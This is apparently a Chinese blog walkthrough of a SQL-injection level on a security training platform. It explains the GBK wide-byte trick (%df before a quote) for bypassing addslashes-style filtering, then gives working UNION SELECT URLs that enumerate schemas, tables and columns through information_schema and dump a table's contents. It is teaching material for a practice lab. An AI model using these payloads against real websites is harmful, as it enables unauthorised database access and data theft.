网络信息安全攻防学习平台 注入关第三

防注入分值: 300

小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!

通关地址

老办法,没有信息就看F12呗

html里面有一个tip  id=1 

ok 知道该怎么做了  http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=1



然后尝试来一个单引号 '  

界面不行了,啥也没有,说明waf过滤了单引号,

这个时候就要考虑到用宽字节%df绕过

经测试,只要是宽字节都可以比如使用%e0。

ascii码大于127的均为宽子节

这里略带一提

该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时,0xbf27本身不是一个有效的GBK字符,但经过  addslashes()

转换后变为0xbf5c27,前面的0xbf5c是个有效的GBK字符,所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理,结果漏洞就触发了

也就是说:%df\’ = %df%5c%27=縗’,有了单引号就好注入了



GBK编码,它的编码范围是0x8140~0xFEFE(不包括xx7F),在遇到%df(ascii(223)) >ascii(128)时自动拼接%5c,因此吃掉‘\’,

在这里 %5c就是‘\’

%df在碰到%5c后,会被拼接在一起变成

而%27、%20小于ascii(128)的字符就保留了。

若有些关于unicod,utf-8,gbk,之类的不清楚的可以查一下知乎以及  http://www.91ri.org/8611.html

我们在输入了

?id=2%df%27%20order%20by%203%23

实际上等于?id=2%df' order by 3#

?id=2%df%27%20order%20by%204%23

之后,可以判断出,字段数为3 

then

lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%df%27%20UNION%20SELECT%201,2,3%23


网络信息安全攻防学习平台 注入关第三_第1张图片
出现了2和3

接下去按着前一篇文章慢慢来

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2%bf%27%20union%20select%201,concat(group_concat(distinct+schema_name)),3%20from%20information_schema.schemata%23

这个url有点长啊。。。主要用到的是concat(group_concat(distinct+schema_name))

至于每个函数的功能自己查吧


网络信息安全攻防学习平台 注入关第三_第2张图片

然后就是自己翻     用这个

concat(group_concat(distinct+table_name))

打开mydbs

别打开test了。。。我已经打开过了。里面啥都没有!!


网络信息安全攻防学习平台 注入关第三_第3张图片

next

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2¿' union select 1,concat(group_concat(distinct+column_name )),3 from information_schema.columns where table_name=0x7361655F757365725F73716C6934#


网络信息安全攻防学习平台 注入关第三_第4张图片

胜利就在前方!!!

http://lab1.xseclab.com/sqli4_9b5a929e00e122784e44eddf2b6aa1a0/index.php?id=2¿' union select 1,concat(group_concat(id,0x3a,title_1,0x3a,content_1)),3 from sae_user_sqli4 #


OK了,这两道题的套路都还差不多了,希望大家多熟悉熟悉

你可能感兴趣的:(网络信息安全攻防学习平台 注入关第三)